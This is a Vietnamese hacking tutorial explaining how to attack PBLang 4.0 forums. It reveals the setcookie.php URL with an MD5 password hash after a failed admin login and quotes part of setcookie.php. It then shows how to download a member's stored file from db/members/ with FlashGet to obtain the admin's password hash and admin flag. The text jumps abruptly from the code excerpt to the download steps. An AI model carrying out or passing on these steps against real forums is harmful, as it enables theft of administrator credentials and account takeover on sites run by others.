Hack PBLang forum 4.0 qua cookie
trang này đã được đọc lần
Đặc điểm của PBLang:
Ngôn ngữ: PHP.
Tác giả: PB Dev Team & MPHH Project Team.
Home Page: />Nét đặc biệt:
Không sử dụng DB.(Nên tỉ lệ thành công của việc tấn công SQL Inject là 100%... thất bại)
Quản lí thành viên dựa trên cookie.
Cookie nằm luôn tại server chứ không nằm ở PC của người sử dụng như cookie của các forum
khác.
Các công cụ cần thiết:
Flash Get.
IntelliTamper (có thể có hoặc không).
Một bộ óc biết suy nghĩ. :-p
Một tách cà phê.
Sơ lược:
Ở một số forum, việc lấy được cookie của Admin thì cũng chả làm được gì vì không vào được
Admin Control Panel (ACP). Nhưng đối với PBLang thì cookie lại là vấn đề sống còn vì forum này
không hề sử dụng DB nên tất cả các thông tin về member đều nằm tại cookie.
Hãy thực hiện một ví dụ như sau:
- Vào trang login.php của một forum PBLang
- Đăng nhập bằng tên của Admin (giả sử là: 0Admin0) với mật khẩu bất kì.
- Và tất nhiên là sai password. Ta sẽ nhận được thông báo : Invalid password!
- Ok, nào bây giờ ta hãy nhìn lên thanh Address của IE xem. Ta sẽ thấy một URL có dạng sau:
http://www.[target].com/PBLang/setcookie.php?
u=0Admin0&p=098f6bcd4621d373cade4e832627b4f6
Tớ sẽ giải thích cái này sau, nào bây giờ hãy xem tiếp một phần của file setcookie.php:
...
$u=$HTTP_GET_VARS['u'];
$p=$HTTP_GET_VARS['p'];
include("global.php");

mục URL: nhập vào:
http://www/.[target].com/db/members/<cookie’s name>
(chổ cookie’s name bạn hãy thế vào tên của user mà bạn muốn lấy cookie). Còn tất cả các mục
còn lại thì giữ nguyên.
Sau khi download cookie của user nào đó về, bạn hãy mở nó ra. File cookie của PBLang có dạng
sau:
<?php
$userid="1";
$password="e10adc3949ba59abbe56e057f20f883e";
$username="0Admin0";
$useralias="Admin";
$userrealname="";
$useremail="";
$useremhide="";
$userip="";
$usersig="";
$userslogan="PBLang is super!";
$useravatar="none";
$usermsn="";
$userposts="0";
$usericq="";
$userqq="";
$userwebavatar="";
$userrank="7";
$useryahoo="";
$useraim="";
$userlocation="";
$userjoined="1052391784";
$userhomepage="http://";
$useradmin="1";

-Nếu down file cookie kkhông được thì bạn hãy dùng Web Downloader để down cả trang web về
ổ cứng, sau đó tìm cookie.